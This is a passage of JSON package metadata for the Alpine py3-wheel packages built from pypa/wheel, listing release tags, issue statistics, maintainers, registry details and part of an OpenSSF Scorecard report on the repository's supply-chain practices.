a/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.282Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":14.388848354517874,"stargazers_count":14.040769670413411,"forks_count":10.863021527910078,"average":9.823159888210341},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":118,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2023-08-01T09:12:25.737Z","updated_at":"2023-08-01T09:12:25.737Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39517,"maintainers_count":891,"namespaces_count":3,"keywords_count":6579,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2727},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-06-10T05:16:50.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":6207330,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2020-12-14T10:43:20.000Z","latest_release_published_at":"2020-12-14T10:43:20.000Z","latest_release_number":"0.36.2-r0","last_synced_at":"2026-04-02T15:02:38.606Z","created_at":"2023-02-01T02:36:13.130Z","updated_at":"2026-04-02T15:02:38.606Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.13/community/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 